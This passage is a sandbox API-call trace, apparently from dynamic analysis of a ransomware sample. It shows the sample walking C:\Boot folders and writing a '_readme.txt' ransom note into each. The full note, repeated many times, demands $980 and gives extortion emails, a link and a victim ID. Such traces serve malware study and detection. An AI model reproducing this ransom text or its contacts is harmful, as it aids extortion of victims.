return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" [0090.789] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99cad78 [0090.789] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\_readme.txt" (normalized: "c:\\boot\\fi-fi\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0090.789] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8b0) returned 0x31cf750 [0090.790] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x857) returned 0x3189d50 [0090.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x3189d50, cbMultiByte=2135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 1112 [0090.790] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x316f0d0 [0090.790] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3189d50 | out: hHeap=0x680000) returned 1 [0090.790] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.790] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 1111 [0090.790] WriteFile (in: hFile=0x5cc, lpBuffer=0x316f0d0*, nNumberOfBytesToWrite=0x457, lpNumberOfBytesWritten=0x9ccfb64, lpOverlapped=0x0 | out: lpBuffer=0x316f0d0*, lpNumberOfBytesWritten=0x9ccfb64*=0x457, lpOverlapped=0x0) returned 1 [0090.791] CloseHandle (hObject=0x5cc) returned 1 [0090.791] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316f0d0 | out: hHeap=0x680000) returned 1 [0090.791] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99cad78 | out: hHeap=0x680000) returned 1 [0090.791] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f52d8 | out: hHeap=0x680000) returned 1 [0090.791] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.791] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.791] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa32da2c0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa32da2c0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0090.791] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.791] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa32da2c0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa32da2c0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.791] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0090.791] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa32da2c0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa32da2c0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa32da2c0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0090.791] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa32da2c0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa32da2c0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa32da2c0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0090.791] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0090.792] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.792] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef28 | out: hHeap=0x680000) returned 1 [0090.792] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef28 [0090.792] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0090.792] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.792] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.792] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.792] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.792] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.792] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.792] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.792] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.792] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.792] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.792] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.792] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.792] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.792] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.792] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.792] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.792] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.792] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.792] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.792] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.792] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.792] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.792] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.792] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.792] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.792] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.792] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99e3968 [0090.792] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.792] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.793] PathFindFileNameW (pszPath="C:\\Boot\\Fonts\\") returned="Fonts\\" [0090.793] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.793] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0090.793] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0090.793] PathFindFileNameW (pszPath="") returned="" [0090.793] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.793] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0090.794] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0090.794] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x800) returned 0x31d1120 [0090.794] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0090.794] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x810) returned 0x99ca4f0 [0090.794] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.794] FreeLibrary (hLibModule=0x75670000) returned 1 [0090.794] PathAppendW (in: pszPath="C:\\Boot\\Fonts\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\Fonts\\_readme.txt") returned 1 [0090.794] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.794] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.794] PathFileExistsW (pszPath="C:\\Boot\\Fonts\\_readme.txt") returned 0 [0090.795] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x7d00) returned 0x99f52d8 [0090.795] lstrcpyW (in: lpString1=0x99f52d8, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda" [0090.795] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda", lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" [0090.795] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99cad78 [0090.795] CreateFileW (lpFileName="C:\\Boot\\Fonts\\_readme.txt" (normalized: "c:\\boot\\fonts\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0090.797] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8b0) returned 0x31cf750 [0090.797] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x857) returned 0x3189d50 [0090.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x3189d50, cbMultiByte=2135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 1112 [0090.797] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x316f0d0 [0090.798] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3189d50 | out: hHeap=0x680000) returned 1 [0090.798] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.798] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 1111 [0090.798] WriteFile (in: hFile=0x5cc, lpBuffer=0x316f0d0*, nNumberOfBytesToWrite=0x457, lpNumberOfBytesWritten=0x9ccfb64, lpOverlapped=0x0 | out: lpBuffer=0x316f0d0*, lpNumberOfBytesWritten=0x9ccfb64*=0x457, lpOverlapped=0x0) returned 1 [0090.799] CloseHandle (hObject=0x5cc) returned 1 [0090.799] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316f0d0 | out: hHeap=0x680000) returned 1 [0090.799] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99cad78 | out: hHeap=0x680000) returned 1 [0090.799] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f52d8 | out: hHeap=0x680000) returned 1 [0090.799] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.799] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.799] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa3300420, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3300420, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0090.799] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.799] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa3300420, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3300420, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.800] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0090.800] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac191e00, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac191e00, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6505f253, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0090.800] FindNextFileW (in: hFindFile=0x6bdca8, 